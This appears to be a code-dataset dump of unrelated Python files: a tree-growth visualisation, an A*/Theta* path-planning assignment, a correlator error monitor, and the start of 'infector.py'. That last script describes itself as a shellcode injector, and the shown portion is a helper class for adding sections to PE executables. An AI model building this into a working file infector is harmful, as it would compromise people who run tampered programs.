self.thickness += self.thicken
if self.terminated == 0: #...and i have a meristem...
if random.random() <= self.splitchance:
self.branchoff()
self.size += growth
self.incmod *= branchdrop
if abs(self.inclination) < maxinc:
self.inclination = self.parent.inclination+self.incmod
else:
self.delete()
self.origin = self.parent.get_end(self.relativeorigin)
self.end = self.get_end(self.size)
for b in self.children:
b.grow()
class Trunk(Branch):
''' A Branch who has no parent -- used to start a tree '''
def __init__(self, origin):
self.azimuth = random.random()*math.pi*2
self.inclination = 0
self.order = -1
self.splitchance = splitchance
super().__init__(0, 0, self,origin)
class VBranch(Branch, v.cone):
def __init__(self, *a):
super().__init__(*a)
v.cone.__init__(self, pos=self.origin, axis=(self.end-self.origin), radius=self.thickness, color=treebark)
def delete(self):
self.visible = False
super().delete()
def draw(self):
self.pos = self.origin
self.axis = (self.end-self.origin)
self.radius = (self.thickness)
if self.children:
for b in self.children:
b.draw()
class VTrunk(Trunk, VBranch):
pass
height = 800
width = 1000
# random.seed(232)
green = (0.2,0.8,0)
yello = (0.8,0.8,0)
treebark = (0.6,0.4,0)
incrange = 0.5
azrange = math.pi*2
growth = 0.03
splitchance = 0.005
leafmod = 0.1
maxinc = math.pi/2
branchdrop = 1.0005
dominance = 1 #how much nutrients does a parent give its child?
display = v.display(title="my own tree!",width=width,height=height)
tree = VTrunk((0,0,0))
mousedown = 0
growit = 0
while 1:
if display.kb.keys:
key = display.kb.getkey()
if key == 'e':
growit = 1
else:
growit = 0
if growit:
tree.grow()
display.center = tree.get_end(tree.size/2)
tree.draw()
|
UTF-8
|
Python
| false | false | 2,014 |
19,078,244,732,909 |
c62ebf89f2cf2f42d0e4b00902557fffa491a38b
|
7775fbd81b6f4cd2790046651e6640cce7904c11
|
/001-Any_Angle_Path_Planning/Program/main.py
|
995803fbde1e69996c64d1b209e8e83ac953b134
|
[] |
no_license
|
SajidQ/AI_CS382_Projects
|
https://github.com/SajidQ/AI_CS382_Projects
|
3011b10db3cdcf4d3fcd9e7909945535bfe4edb6
|
57497421d639774fa5b970fd708473ac90cd9499
|
refs/heads/master
| 2021-01-25T05:27:58.980568 | 2013-01-28T04:34:26 | 2013-01-28T04:34:26 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Authors: Tina Nye & Qandeel Sajid
# Project: AI-Project 1
#! /usr/bin/env python
# Pygame visualization template
import pygame
import math
import min_heap
import sys
import time
import functions
import A_star
import Theta_star
import random
from apgl.graph.SparseGraph import *
from apgl.graph.VertexList import *
import numpy
import scipy.sparse
###### Print Intro
print "\n--------------------------------"
print "Program: Any-Angle Path Planning"
print "By: Tina Nye & Qandeel Sajid"
##############################################################################
#-----CONSTANTS-------------------------------------------------
# Define some colors
black = ( 0, 0, 0)
white = ( 255, 255, 255)
green = ( 0, 255, 0)
blue=(0,0,255)
red = ( 255, 0, 0)
gray=(88, 88, 88)
pink=(255,0,255)
light_blue=(0,255,255)
light_gray=(152,152,152)
percentBlocked=.1 #--10%
# This sets the width and height of each grid location
width=11
height=11
#width=21
#height=21
# This sets the margin between each cell
margin=1
# Set the row and column length
rowLength = 52
colLength = 102
#rowLength = 26
#colLength = 51
file_provided=False
##############################################################################
#check if file is provided
#if so, get obstacles, start/goal from file
if(len(sys.argv)>1):
try:
fin=open(sys.argv[1], "r")
except IOError:
print '\nERROR: Cannot open file, will use random obstacles and start/goal'
else:
obstacles=[]
print sys.argv[1]
file_provided=True
#read every thing from file
fileInfo=[]
fileInfo.append(fin.readline())
while fileInfo[len(fileInfo)-1]:
fileInfo.append(fin.readline())
# Get obstacles from file
for i in range (len(fileInfo)-3):
val= (fileInfo[i].split(' '))
#print str(i) +":"+str(val) + " " + str(val[0])+ " " + str(val[1])
x=int(val[0])
y=int(val[1])
#print str(x)+ " "+str(y)
obstacles.append([x,y]) #get the x, y coordinated
#get start/goal from end of file
val= (fileInfo[len(fileInfo)-3].split(' '))
x=int(val[0])
y=int(val[1])
start=[x,y]
val= fileInfo[len(fileInfo)-2].split(' ')
x=int(val[0])
y=int(val[1])
goal=[x,y]
#-----------------------------------------------------------------
##############################################################################
##############################################################################
##############################################################################
#--- Randomly pick out 10% BLOCKED CELLS if file not provided ---
#This sections first randomly picks random vertices and makes them into obstacles. The if statement ensures that the border does not count as the 10% of blocked vertices
if(file_provided==False):
obstacles=[]
maxBlockCells=int(math.floor((rowLength-2)*(colLength-2)*percentBlocked))
#print "number of blocked cells: " + str(maxBlockCells)
while(len(obstacles)!=maxBlockCells):
x=int(math.floor(random.random()*(colLength-1)))
y=int(math.floor(random.random()*(rowLength-1)))
#print str(x) +", y="+ str(y)
if(obstacles.count([x,y])==0 and x!=0 and x!=colLength and y!=0 and y!= rowLength):
obstacles.append([x,y])
# this part blocks out the bordering cells
for i in range(colLength):
obstacles.append([i,0])
obstacles.append([i, rowLength-1])
for i in range(rowLength):
obstacles.append([0, i])
obstacles.append([colLength-1,i])
##############################################################################
##############################################################################
##############################################################################
#---- Making the Graph ---------------------------------------------
# This initializes the graph, just basic things (its in the SparseGraph Ex)
numFeatures=0
numVertices=(rowLength-1)*(colLength-1)
vList=GeneralVertexList(numVertices)
weightMatrix = scipy.sparse.lil_matrix((numVertices, numVertices))
graph = SparseGraph(vList,True, W=weightMatrix) # HERE IS YOUR GRAPH!
#-- This assigns to each vertex an array as a value. In the array, the first value is the x location, and then y (row), and 1 implies the vertex is unexplored. 0 will mean it is closed. The fourth value determines whether the vertex is in the fringe (1) or not (0)
#-- 5th value-g(A*), h(A*), f(A*), g(Theta*), h(Theta*), f(Theta*)
row=1
for i in range (graph.getNumVertices()):
if(i%(colLength-1)==0 and i!=0):
row=row+1
graph.setVertex(i, [(i%(colLength-1))+1,row, 1, 0,100000000000.0,0.0, 100000000000.0,100000000000.0, 0.0, 100000000000.0])
#----- Connect vertices
# This just runs through and connects the vertices
# This is pretty complicated, and you don't need to worry about it. The code here should be right becuase the red edges are draen correctly
edgeCheck=[]
for row in range((rowLength-1)):
for column in range(colLength-1):
x=column+1
y=row+1
vertex1=(((colLength-1)*row)+column)
vertex2=(((colLength-1)*row)+column)+1
if((((colLength-1)*row)+column)<numVertices and edgeCheck.count([vertex2,vertex1])==0 and vertex1%(colLength-1)<(colLength-2)):
if(not(obstacles.count([x,y])!=0 and obstacles.count([x,(y-1)])!=0)):
#print "v1: " + str(vertex1) + "v2: " + str(vertex2)
graph.addEdge(vertex1,vertex2, edge=1)
vertex2=(((colLength-1)*row)+column)+(colLength-1)
if((((colLength-1)*row)+column)<numVertices and edgeCheck.count([vertex2,vertex1])==0 and vertex2<numVertices):
if(not(obstacles.count([x,y])!=0 and obstacles.count([(x-1),y])!=0)):
#print "v1: " + str(vertex1) + "v2: " + str(vertex2)
graph.addEdge(vertex1,vertex2, edge=1)
#do the diagonals
vertex2=(((colLength-1)*row)+column)+(colLength)
if(obstacles.count([x,y])==0 and (((colLength-1)*row)+column)<numVertices and edgeCheck.count([vertex2,vertex1])==0 and vertex1%(colLength-1)<(colLength-1) and vertex1%(rowLength-1)<(rowLength-1) and vertex2<numVertices and vertex1%(colLength-1)!=(colLength-2)):
graph.addEdge(vertex1,vertex2, edge=math.sqrt(2))
vertex1=(((colLength-1)*row)+column)
vertex2=(((colLength-1)*row)+column)+(colLength-2)
if((((colLength-1)*row)+column)<numVertices and vertex1%(colLength-1)<(colLength-1) and vertex1%(rowLength-1)<(rowLength-1) and vertex2<numVertices and vertex1%(colLength-1)!=0):
if(not(obstacles.count([(x-1),y])!=0)):
graph.addEdge(vertex1,vertex2, edge=math.sqrt(2))
numEdges=graph.getNumEdges()
print "\nVertices: " + str(graph.getNumVertices())
print "Edges: " + str(graph.getNumEdges())
#-----------------------------------
# Here is where we choose a random start/goal locations. You probably don't need to touch any of this.
if(file_provided==False):
goal=[]
start=[]
#---- Get random start ------------------
while start==[]:
id=int((i*random.random())%i)
vrtx=graph.getVertex(id)
if(len(graph.neighbours(id))>1):
x=vrtx[0]
y=vrtx[1]
if(x!=0 and x!=colLength and y!=0 and y!=rowLength):
start=[x,y]
#---- Get random goal -------------------
while goal==[]:
id=int((i*random.random())%i)
vrtx=graph.getVertex(id)
if(len(graph.neighbours(id))>1):
x=vrtx[0]
y=vrtx[1]
if(start!=[x,y] and x!=0 and x!=colLength and y!=0 and y!=rowLength):
goal=[x,y]
print "Start: " +str(start)
print "Goal: " +str(goal)
#--------------------------------------------------------------
##############################################################################
##############################################################################
# WRITE OUT TO FILE (write the obstacle out if the file is not provided)
"""
name="test_samples/"+str(t)+".txt"
print "Printing file: " + name
if(file_provided==False):
fout=open(name, "w")
for i in range (len(obstacles)):
item=obstacles[i]
fout.write(str(item[0]))
fout.write(" ")
fout.write(str(item[1]))
fout.write("\n")
#write out start
fout.write(str(start[0]))
fout.write(" ")
fout.write(str(start[1]))
fout.write("\n")
#write out goal
fout.write(str(goal[0]))
fout.write(" ")
fout.write(str(goal[1]))
fout.write("\n")
fout.close()
"""
##############################################################################
##############################################################################
##############################################################################
#parent list
parent=[-1 for x in range(graph.getNumVertices())]
parentTheta=[-1 for x in range(graph.getNumVertices())]
parentV=[-1 for x in range(graph.getNumVertices())]
#run A*
a_star=A_star.A_star(graph,[])
parent=a_star.run(start, goal)
#run Theta*
theta_star=Theta_star.Theta_star(graph,obstacles)
parentTheta=theta_star.run(start, goal)
#check if anyone found path
child=functions.getVertexID(goal[0], goal[1])
parents=parent[child]
parentT=parentTheta[child]
if (parents==-1 and parentT==-1):
print "No paths found!"
sys.exit()
#############################################################################
#############################################################################
#############################################################################
#run A* on visibility graph
corners=[start,goal]
for i in range (len(obstacles)):
value=obstacles[i]
if(value[0]!=0 and value[1]!=0 and value[0]!=(colLength-1) and value[1]!=(rowLength-1)):
corners.append(value)
corners.append([value[0]+1,value[1]])
corners.append([value[0],value[1]+1])
corners.append([value[0]+1,value[1]+1])
open_vrts=[]
count=0
for i in range (graph.getNumVertices()):
value=graph.getVertex(i)
found=False
#check each corner
for j in range (len(corners)):
obs_val=corners[j]
if(value[0]==obs_val[0] and value[1]==obs_val[1]):
found=True
break
if(found!=False):
open_vrts.append(i)
count=count+1
#** make new graph
numFeatures=0
numVertices=(rowLength-1)*(colLength-1)
vList=GeneralVertexList(numVertices)
weightMatrix = scipy.sparse.lil_matrix((numVertices, numVertices))
graph_new = SparseGraph(vList,True, W=weightMatrix) # HERE IS YOUR GRAPH!
#-- This assigns to each vertex an array as a value. In the array, the first value is the x location, and then y (row), and 1 implies the vertex is unexplored. 0 will mean it is closed. The fourth value determines whether the vertex is in the fringe (1) or not (0)
#-- 5th value-g(A*), h(A*), f(A*), g(Theta*), h(Theta*), f(Theta*)
row=1
for i in range (graph_new.getNumVertices()):
if(i%(colLength-1)==0 and i!=0):
row=row+1
graph_new.setVertex(i, [(i%(colLength-1))+1,row, 1, 0,100000000000.0,0.0, 100000000000.0,100000000000.0, 0.0, 100000000000.0])
#print "old: " + str(graph.getNumEdges()) + " new graph: " + str(graph_new.getNumEdges())
#check is another file is available
edge_file=False
if(len(sys.argv)>2):
try:
fin=open(sys.argv[2], "r")
except IOError:
print '\nERROR: Cannot open file, will use random obstacles and start/goal'
else:
print sys.argv[2]
edge_file=True
#read every thing from file
fileInfo=[]
fileInfo.append(fin.readline())
while fileInfo[len(fileInfo)-1]:
fileInfo.append(fin.readline())
# Get obstacles from file
for i in range (len(fileInfo)-1):
val= (fileInfo[i].split(' '))
node1=int(val[0])
node2=int(val[1])
v1=graph_new.getVertex(node1)
v2=graph_new.getVertex(node2)
graph_new.addEdge(node1,node2, edge=functions.getDistance(v1[0],v1[1],v2[0],v2[1]))
#run A* on visibility graph
visibility_a_star=A_star.A_star(graph_new, open_vrts)
parentV=visibility_a_star.run_visibility(start, goal,obstacles, open_vrts,graph, edge_file)
"""
#---- out put the edges
name="test_samples/"+str(t)+"edges.txt"
print "Printing file: " + name
if(file_provided==False and edge_file==False):
fout2=open(name, "w")
edges=graph_new.getAllEdges();
for i in range (len(edges)):
item=edges[i]
fout2.write(str(item[0]))
fout2.write(" ")
fout2.write(str(item[1]))
fout2.write("\n")
fout2.close()
"""
#############################################################################
#############################################################################
#############################################################################
# UNCOMMENT THIS WHEN NOT SCRIPTING
pygame.init()
# Set the height and width of the screen
size = [colLength*(width+margin)+1, rowLength*(width+margin)+1]
#size=[613,313]
screen = pygame.display.set_mode(size)
pygame.display.set_caption("Path Visualization")
#Loop until the user clicks the close button.
done = False
# Used to manage how fast the screen updates
clock = pygame.time.Clock()
blockedDone=False
# -------- Main Program Loop ----------- ######################################
while done==False:
for event in pygame.event.get(): # User did something
if event.type == pygame.QUIT: # If user clicked close
done=True # Flag that we are done so we exit this loop
elif event.type == pygame.MOUSEBUTTONDOWN:
cursor = event.pos#pygame.mouse.get_pos()
row_=int(math.floor(cursor[1]/(margin+width)))
col_=int(math.floor(cursor[0]/(margin+width)))
print("x: " + str(col_ ))
print("y: " + str(row_ ))
print("Vertex: " + str(functions.getVertexID(col_, row_)))
vertexInfo=graph.getVertex(functions.getVertexID(col_, row_))
visibility_info=graph_new.getVertex(functions.getVertexID(col_, row_))
print "A* --- f: " + str(vertexInfo[6]) + " g: " + str(vertexInfo[4] )+ " h: " +str(vertexInfo[5])
print "Theta* --- f: " + str(vertexInfo[9]) + " g: " + str(vertexInfo[7] )+ " h: " +str(vertexInfo[8])
print "Visibility+A* --- f: " + str(visibility_info[6]) + " g: " + str(visibility_info[4] )+ " h: " +str(visibility_info[5])
#check for pressed key to pick start
elif event.type == pygame.KEYDOWN:
if pygame.key.name(event.key)=="return":
print "\nStarting Algorithm. . . "
done=True
# Set the screen background
screen.fill(black)
# ALL CODE TO DRAW SHOULD GO BELOW THIS COMMENT #############################
offset = margin + width
# Draw the grid -----------------
for row in range(rowLength):
startY = row * offset
for column in range(colLength):
#check for blocked cell
foundCell=False
for [x, y] in obstacles:
if [column, row]==[x,y]:
foundCell=True
#make cell gray or white
if column==0 or row==0 or column==(colLength-1) or row==(rowLength-1) or foundCell==True:
sqrColor=gray
pygame.draw.rect(screen,sqrColor,[(margin+width)*column+margin,(margin+height)*row+margin,width,height])
else:
sqrColor = white
pygame.draw.rect(screen,sqrColor,[(margin+width)*column+margin,(margin+height)*row+margin,width,height])
# for drawing forward diagonals in the squares
startX = column * offset
if (column!=0 and row!=0 and column!=(colLength-1) and row!=(rowLength-1)) and foundCell==False:
lineColor = black
pygame.draw.line(screen, lineColor, [startX, startY], [startX + offset, startY + offset], margin)
# draw the backward diagonals
for row in range(rowLength):
startY = row * offset
for column in range(colLength):
#check for blocked cell
foundCell=False
for [x, y] in obstacles:
if [column, row]==[x,y]:
foundCell=True
# for drawing backward diagonals in the squares
startX = offset + margin
startX += column * offset
if (column!=0 and row!=0 and column!=(colLength-1) and row!=(rowLength-1)) and foundCell==False:
lineColor = black
pygame.draw.line(screen, lineColor, [startX, startY], [startX - offset, startY + offset], margin)
edges=graph_new.getAllEdges();
for i in range (len(edges)):
node1=[(((edges[i][0]%(colLength-1))+1)*(width+margin)),(((edges[i][0]/(colLength-1))+1)*(width+margin))]
node2=[(((edges[i][1]%(colLength-1))+1)*(width+margin)),(((edges[i][1]/(colLength-1))+1)*(width+margin))]
#print str(node1)+" "+str(node2)
pygame.draw.line(screen, black, (node1[0], node1[1]), (node2[0], node2[1]), 1)
child=functions.getVertexID(goal[0], goal[1])
parents=parent[child]
if (parents!=-1):
while(not(parents==functions.getVertexID(start[0], start[1]) and child==functions.getVertexID(start[0], start[1]))):
xLoc1=(((child%(colLength-1))+1)*(width+margin))
yLoc1=(((child/(colLength-1))+1)*(width+margin))
xLoc2=(((parents%(colLength-1))+1)*(width+margin))
yLoc2=(((parents/(colLength-1))+1)*(width+margin))
pygame.draw.line(screen, red, (xLoc1, yLoc1), (xLoc2, yLoc2), 2)
child=parents
parents=parent[child]
#print the Theta*
child=functions.getVertexID(goal[0], goal[1])
parents=parentTheta[child]
if (parents!=-1):
while(not(parents==functions.getVertexID(start[0], start[1]) and child==functions.getVertexID(start[0], start[1]))):
xLoc1=(((child%(colLength-1))+1)*(width+margin))
yLoc1=(((child/(colLength-1))+1)*(width+margin))
xLoc2=(((parents%(colLength-1))+1)*(width+margin))
yLoc2=(((parents/(colLength-1))+1)*(width+margin))
pygame.draw.line(screen, blue, (xLoc1, yLoc1), (xLoc2, yLoc2), 2)
child=parents
parents=parentTheta[child]
#print the Theta*
child=functions.getVertexID(goal[0], goal[1])
parents=parentV[child]
if (parents!=-1):
while(not(parents==functions.getVertexID(start[0], start[1]) and child==functions.getVertexID(start[0], start[1]))):
xLoc1=(((child%(colLength-1))+1)*(width+margin))
yLoc1=(((child/(colLength-1))+1)*(width+margin))
xLoc2=(((parents%(colLength-1))+1)*(width+margin))
yLoc2=(((parents/(colLength-1))+1)*(width+margin))
pygame.draw.line(screen, light_blue, (xLoc1, yLoc1), (xLoc2, yLoc2), 2)
child=parents
parents=parentV[child]
insert=(int(math.ceil(start[0]*(margin+width))), int(math.ceil(start[1]*(margin+width))))
pygame.draw.circle(screen,green,insert,int(.5*width),int(.5))
insert=(int(math.ceil(goal[0]*(margin+width))), int(math.ceil(goal[1]*(margin+width))))
pygame.draw.circle(screen,pink,insert,int(.5*width),int(.5))
#------------------------------
#---------ALL CODE TO DRAW SHOULD GO ABOVE THIS COMMENT --------
# Limit to 20 frames per second
clock.tick(9000)
# update the screen
pygame.display.flip()
#####---------END FIRST DISPLAY LOOP ---------#################################
# Be IDLE friendly. If you forget this line, the program will 'hang' on exit.
pygame.quit()
|
UTF-8
|
Python
| false | false | 2,013 |
2,886,218,024,710 |
a18c095efa35d70f7eec76d613f560634243df9a
|
9f7ab3623b1139c3d54377639f606739b9e010b1
|
/corr-0.4.2.2010-10-14/scripts/corr_read_missing.py
|
d5691bd8888370f4a2c588b85eede4201eebc773
|
[
"GPL-2.0-or-later"
] |
non_permissive
|
zakiali/PAPERCORR
|
https://github.com/zakiali/PAPERCORR
|
c98a157a52c25c5d5322ab6368a69cf5c6847822
|
8816b49401e2dbd9995e9ea76788627eaebc9741
|
refs/heads/master
| 2020-05-28T08:05:46.016329 | 2012-07-30T20:13:44 | 2012-07-30T20:13:44 | 2,115,716 | 3 | 2 | null | false | 2012-06-11T18:27:00 | 2011-07-27T22:57:39 | 2012-06-11T18:26:59 | 2012-06-11T18:26:59 | 128 | null | null | null |
Python
| null | null |
#! /usr/bin/env python
"""
Reads the error counters on the correlator and reports accumulated XAUI and
packet errors.
\n\n
Revisions:
2009-12-01 JRM Layout changes, check for loopback sync
2009/11/30 JRM Added support for gbe_rx_err_cnt for rev322e onwards.
2009/07/16 JRM Updated for x engine rev 322 with KATCP.
"""
import corr, time, sys,struct,logging
def exit_fail():
print 'FAILURE DETECTED. Log entries:\n',lh.printMessages()
print "Unexpected error:", sys.exc_info()
try:
c.disconnect_all()
except: pass
raise
exit()
def exit_clean():
try:
c.disconnect_all()
except: pass
exit()
if __name__ == '__main__':
from optparse import OptionParser
p = OptionParser()
p.set_usage('read_missing.py [options] CONFIG_FILE')
p.set_description(__doc__)
opts, args = p.parse_args(sys.argv[1:])
if args==[]:
print 'Please specify a configuration file! \nExiting.'
exit()
lh=corr.log_handlers.DebugLogHandler()
try:
print 'Connecting...',
c=corr.corr_functions.Correlator(args[0],lh)
for s,server in enumerate(c.config['servers']): c.loggers[s].setLevel(10)
print 'done.'
servers = c.servers
n_xeng_per_fpga = c.config['x_per_fpga']
n_xaui_ports_per_fpga=c.config['n_xaui_ports_per_fpga']
xeng_acc_len=c.config['xeng_acc_len']
start_t = time.time()
#clear the screen:
print '%c[2J'%chr(27)
while True:
loopback_ok=c.check_loopback_mcnt()
xaui_errors=[c.read_uint_all('xaui_err%i'%(x)) for x in range(n_xaui_ports_per_fpga)]
xaui_rx_cnt=[c.read_uint_all('xaui_cnt%i'%(x)) for x in range(n_xaui_ports_per_fpga)]
gbe_tx_cnt =[c.read_uint_all('gbe_tx_cnt%i'%(x)) for x in range(n_xaui_ports_per_fpga)]
gbe_tx_err =[c.read_uint_all('gbe_tx_err_cnt%i'%(x)) for x in range(n_xaui_ports_per_fpga)]
rx_cnt = [c.read_uint_all('rx_cnt%i'%(x)) for x in range(min(n_xaui_ports_per_fpga,n_xeng_per_fpga))]
gbe_rx_cnt = [c.read_uint_all('gbe_rx_cnt%i'%x) for x in range(min(n_xaui_ports_per_fpga,n_xeng_per_fpga))]
gbe_rx_err_cnt = [c.read_uint_all('gbe_rx_err_cnt%i'%x) for x in range(min(n_xaui_ports_per_fpga,n_xeng_per_fpga))]
gbe_rx_down = [c.read_uint_all('gbe_rx_down') for x in range(min(n_xaui_ports_per_fpga,n_xeng_per_fpga))]
rx_err_cnt = [c.read_uint_all('rx_err_cnt%i'%x) for x in range(min(n_xaui_ports_per_fpga,n_xeng_per_fpga))]
loop_cnt = [c.read_uint_all('loop_cnt%i'%x) for x in range(min(n_xaui_ports_per_fpga,n_xeng_per_fpga))]
loop_err_cnt = [c.read_uint_all('loop_err_cnt%i'%x) for x in range(min(n_xaui_ports_per_fpga,n_xeng_per_fpga))]
mcnts = [c.read_uint_all('loopback_mux%i_mcnt'%(x)) for x in range(min(n_xaui_ports_per_fpga,n_xeng_per_fpga))]
x_cnt = [c.read_uint_all('pkt_reord_cnt%i'%(x)) for x in range(n_xeng_per_fpga)]
x_miss = [c.read_uint_all('pkt_reord_err%i'%(x)) for x in range(n_xeng_per_fpga)]
last_miss_ant = [c.read_uint_all('last_missing_ant%i'%(x)) for x in range(n_xeng_per_fpga)]
vacc_cnt = [c.read_uint_all('vacc_cnt%i'%x) for x in range(n_xeng_per_fpga)]
vacc_err_cnt = [c.read_uint_all('vacc_err_cnt%i'%x) for x in range(n_xeng_per_fpga)]
loopmcnt=[]
gbemcnt=[]
for mi,mv in enumerate(mcnts):
loopmcnt.append([mv[x]/(2**16) for x,f in enumerate(c.fpgas)])
gbemcnt.append([mv[x]&((2**16)-1) for x,f in enumerate(c.fpgas)])
sum_bad_pkts = sum([sum(x_miss_n) for x_miss_n in x_miss])/xeng_acc_len
sum_xaui_errs = sum([sum(xaui_error_n) for xaui_error_n in xaui_errors])
sum_spectra = sum([sum(engcnt) for engcnt in x_cnt])
# move cursor home
print '%c[2J'%chr(27)
for fn,fpga in enumerate(c.fpgas):
print ' ', servers[fn]
for x in range(n_xaui_ports_per_fpga):
print '\tXAUI%i RX cnt: %10i Errors: %10i'%(x,xaui_rx_cnt[x][fn],xaui_errors[x][fn])
print '\t10GbE%i TX cnt: %10i Errors: %10i'%(x,gbe_tx_cnt[x][fn],gbe_tx_err[x][fn])
for x in range(min(n_xaui_ports_per_fpga,n_xeng_per_fpga)):
print "\t10GbE%i RX cnt: %10i Errors: %10i"%(x,gbe_rx_cnt[x][fn],gbe_rx_err_cnt[x][fn])
print "\t10Gbe%i RX DOWN: Errors: %10i" %(x,gbe_rx_down[x][fn])
print '\tLoopback%i cnt: %10i Ovrflw: %10i'%(x,loop_cnt[x][fn],loop_err_cnt[x][fn])
print "\tLoopback_mux%i cnt: %10i Errors: %10i"%(x,rx_cnt[x][fn],rx_err_cnt[x][fn])
print '\t Loopback%i mcnt: %6i'%(x,loopmcnt[x][fn])
print '\t GBE%i mcnt: %6i'%(x,gbemcnt[x][fn])
for x in range(n_xeng_per_fpga):
print '\tX engine%i Spectr cnt: %10i Errors: %10.2f'%(x,x_cnt[x][fn],float(x_miss[x][fn])/float(xeng_acc_len)),
if x_miss[x][fn]>0: print 'Last missing antenna: %i'%last_miss_ant[x][fn]
else: print ''
print "\tVector Accum%i cnt: %10i Errors: %10i"%(x,vacc_cnt[x][fn],vacc_err_cnt[x][fn])
print ''
print 'Total number of spectra processed: %i'%sum_spectra
print 'Total bad X engine data: %i packets'%sum_bad_pkts
print 'Total bad XAUI packets received: %i'%sum_xaui_errs
print 'Loopback muxes all syncd: ',loopback_ok
print 'Time:', time.time() - start_t
time.sleep(2)
except KeyboardInterrupt:
exit_clean()
except:
exit_fail()
exit_clean()
|
UTF-8
|
Python
| false | false | 2,012 |
15,479,062,162,803 |
12b5d7c85564eadaf31cb4c2641e569693296ba3
|
8e34b9614abef45bc9a82b5b8aa07da32530d7ab
|
/infector.py
|
bcabfbcbbcf0a1ad6728dd7d0d6eba7dd35d094b
|
[] |
no_license
|
ActorExpose/peinfector
|
https://github.com/ActorExpose/peinfector
|
729a34a1dbdc4cefd9e51999ae71f0ce79b3f709
|
a39e7defdde21a8dc175e6bd4b559ca3aca2361f
|
refs/heads/master
| 2021-05-27T20:48:04.815182 | 2014-03-10T12:32:27 | 2014-03-10T12:32:27 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python2
#============================================================================================================#
#===========================================================================================================#
#======= Simply injects a shellcodie into a BMP. ====================================================#
#======= Author: marcoramilli.blogspot.com ==================================================================#
#======= Version: PoC (don't even think to use it in development env.) ======================================#
# SUPER Thanks to n0p for his SectionDoubleP implementation
#======= Disclaimer: ========================================================================================#
#THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR
#IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
#DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
#INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
#SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
#HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
#STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
#IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
#POSSIBILITY OF SUCH DAMAGE.
#===========================================================================================================#
#===========================================================================================================#
from pefile import PE
from struct import pack
import peutils
import pefile, pydasm, sys
class SectionDoublePError(Exception):
pass
class SectionDoubleP:
def __init__(self, pe):
self.pe = pe
def __adjust_optional_header(self):
""" Recalculates the SizeOfImage, SizeOfCode, SizeOfInitializedData and
SizeOfUninitializedData of the optional header.
"""
# SizeOfImage = ((VirtualAddress + VirtualSize) of the new last section)
self.pe.OPTIONAL_HEADER.SizeOfImage = (self.pe.sections[-1].VirtualAddress +
self.pe.sections[-1].Misc_VirtualSize)
self.pe.OPTIONAL_HEADER.SizeOfCode = 0
self.pe.OPTIONAL_HEADER.SizeOfInitializedData = 0
self.pe.OPTIONAL_HEADER.SizeOfUninitializedData = 0
# Recalculating the sizes by iterating over every section and checking if
# the appropriate characteristics are set.
for section in self.pe.sections:
if section.Characteristics & 0x00000020:
# Section contains code.
self.pe.OPTIONAL_HEADER.SizeOfCode += section.SizeOfRawData
if section.Characteristics & 0x00000040:
# Section contains initialized data.
self.pe.OPTIONAL_HEADER.SizeOfInitializedData += section.SizeOfRawData
if section.Characteristics & 0x00000080:
# Section contains uninitialized data.
self.pe.OPTIONAL_HEADER.SizeOfUninitializedData += section.SizeOfRawData
def __add_header_space(self):
""" To make space for a new section header a buffer filled with nulls is added at the
end of the headers. The buffer has the size of one file alignment.
The data between the last section header and the end of the headers is copied to
the new space (everything moved by the size of one file alignment). If any data
directory entry points to the moved data the pointer is adjusted.
"""
FileAlignment = self.pe.OPTIONAL_HEADER.FileAlignment
SizeOfHeaders = self.pe.OPTIONAL_HEADER.SizeOfHeaders
data = '\x00' * FileAlignment
# Adding the null buffer.
self.pe.__data__ = (self.pe.__data__[:SizeOfHeaders] + data +
self.pe.__data__[SizeOfHeaders + len(data):])
section_table_offset = (self.pe.DOS_HEADER.e_lfanew + 4 +
self.pe.FILE_HEADER.sizeof() + self.pe.FILE_HEADER.SizeOfOptionalHeader)
# Copying the data between the last section header and SizeOfHeaders to the newly allocated
# space.
offset_new_section = section_table_offset + self.pe.FILE_HEADER.NumberOfSections*0x28
size = SizeOfHeaders - offset_new_section
data = self.pe.get_data(offset_new_section, size)
self.pe.set_bytes_at_offset(offset_new_section + FileAlignment, data)
# Checking data directories if anything points to the space between the last section header
# and the former SizeOfHeaders. If that's the case the pointer is increased by FileAlignment.
for dir in self.pe.OPTIONAL_HEADER.DATA_DIRECTORY:
if offset_new_section < dir.VirtualAddress and dir.VirtualAddress < SizeOfHeaders:
dir.VirtualAddress += FileAlignment
self.pe.OPTIONAL_HEADER.SizeOfHeaders += FileAlignment
# The raw addresses of the sections are adjusted.
section_raw_address = section_table_offset + 0x14
for section in self.pe.sections:
self.pe.set_dword_at_offset(section_raw_address, section.PointerToRawData+FileAlignment)
section_raw_address += 0x28
self.pe.parse_sections(section_table_offset)
def __is_null_data(self, data):
""" Checks if the given data contains just null bytes.
"""
for char in data:
if char != '\x00':
return False
return True
def pop_back(self):
""" Removes the last section of the section table.
Deletes the section header in the section table, the data of the section in the file,
pops the last section in the sections list of pefile and adjusts the sizes in the
optional header.
"""
# Checking if there are any sections to pop.
if ( self.pe.FILE_HEADER.NumberOfSections > 0
and self.pe.FILE_HEADER.NumberOfSections == len(self.pe.sections)):
# Stripping the data of the section from the file.
if self.pe.sections[-1].SizeOfRawData != 0:
self.pe.__data__ = self.pe.__data__[:-self.pe.sections[-1].SizeOfRawData]
# Overwriting the section header in the binary with nulls.
# Getting the address of the section table and manually overwriting
# the header with nulls unfortunally didn't work out.
self.pe.sections[-1].Name = '\x00'*8
self.pe.sections[-1].Misc_VirtualSize = 0x00000000
self.pe.sections[-1].VirtualAddress = 0x00000000
self.pe.sections[-1].SizeOfRawData = 0x00000000
